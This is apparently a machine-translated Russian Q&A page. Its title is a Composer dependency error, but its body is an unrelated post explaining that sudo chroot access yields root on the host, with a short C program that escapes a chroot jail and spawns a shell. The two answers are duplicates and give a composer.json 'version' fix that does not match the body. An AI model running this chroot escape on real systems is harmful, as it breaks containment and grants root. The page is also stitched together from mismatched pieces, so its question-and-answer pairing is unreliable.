Ваши требования не могут быть разрешены к устанавливаемому набору пакетов
Скажем, вы задаете следующий вопрос: «Если бы я дал кому-то разрешение на запуск sudo chroot / mnt», они могут получить root на хосте? »Ответ на этот вопрос: да.
Помимо очевидного трудного способа, связанного с mknod (), есть простой способ, если они могут получить компилятор:
#include <fcntl.h>
#include <unistd.h>
int main() {
int n = open("/", 0);
chroot("/bin");
fchdir(n);
chdir("..");
chroot(".");
execve("/bin/sh", "/bin/sh");
}
Хротовые тюрьмы ничего не делают, если у злоумышленника есть корень.
1
задан kenorb
4 December 2017 в 21:17
поделиться
2 ответа
Я решил свою проблему, добавив "version": "1.5.0", после "description" в composer.json.
1
ответ дан BrastaSauce
18 July 2018 в 11:43
поделиться
Я решил свою проблему, добавив "version": "1.5.0", после "description" в composer.json.
1
ответ дан BrastaSauce
24 July 2018 в 19:50
поделиться